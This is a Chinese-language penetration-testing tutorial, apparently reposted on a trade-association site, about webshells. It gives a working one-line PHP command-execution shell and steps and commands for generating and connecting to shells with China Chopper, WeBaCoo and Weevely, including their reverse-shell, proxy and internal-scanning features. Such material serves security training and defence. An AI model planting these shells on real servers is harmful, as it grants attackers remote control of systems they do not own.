中国电子商会信息工程测试专业委员会主办
今天是 2024年 12月 09日 星期一
中国电子商会信息工程测试专业委员会
Integrity archives
诚信档案
技术前沿 您的位置:主页 > 诚信档案 > 技术前沿 >
Kali渗透测试_WebShell
2023-06-02 返回列表
  • 之前我们介绍过一句话的webshell

<?php echo shell_exec($_GET['cmd']);?>
  • 中国菜刀

  • 可能被IDS、AV、WAF、扫描器软件发现查杀

 

中国菜刀

  • 下载好了之后,复制这个代码去服务器

图片

图片

 

  • 之后运行客户端程序并添加服务器地址

图片

图片

 

  • 然后双击就可以正常连接了

 

 

 

WeBaCoo(Web Backdoor Cookie)

    • 类终端的shell

    • 编码通信内容通过cookie头传输,隐蔽性较强

    • cm:base64编码的命令

    • cn:服务器用于返回数据

    • cp:返回信息定界符

生成服务端

webacoo -g -o a.php

图片

 

客户端去连接,可以正常连接;

webacoo -t -u http://IP/a.php

图片

 

  • 当然他还有其他很多的命令,自己去试试把

图片

 

Weevely

  • 隐蔽的类终端PHP  Webshell

  • 30多个管理模块

    • 执行系统命令、浏览文件系统

    • 检查服务器常见配置错误

    • 创建正向、反向TCP  SHELL连接

    • 通过目标计算机代理HTTP流量

    • 从目标计算机进行端口扫描,渗透内网

  • 支持连接密码

 

首先需要安装一下库文件

  • 首先访问这个网站https://pypi.python.org/pypi/PySocks/

图片

 

  • 之后解压出来,然后./setup.py install

图片

 

  • 生成服务端并传入至服务器中

weevely generate 123456 wee.php    (132456为连接密码)

图片

图片

 

  • 之后可以连接了

weevely http://192.168.0.119/wee.php 123456 (123456就是设置的密码)

图片

 

  • 当然还有很多的可利用模块,大家可以试试

图片

 

 

 

二维码
中国电子商会信息工程测试专业委员会 电话:010-87660482 传真:010-87660482 邮箱:ceietn@sina.com 地址:北京经济技术开发区博兴六路17号院1号楼3层(100176)
Copyright © 2021-2027 中国电子信息工程与测试网 版权所有 主办单位:中国电子商会信息工程测试专业委员会 技术支持:电设信科(北京)技术有限公司 备案号:京ICP备11002915号-001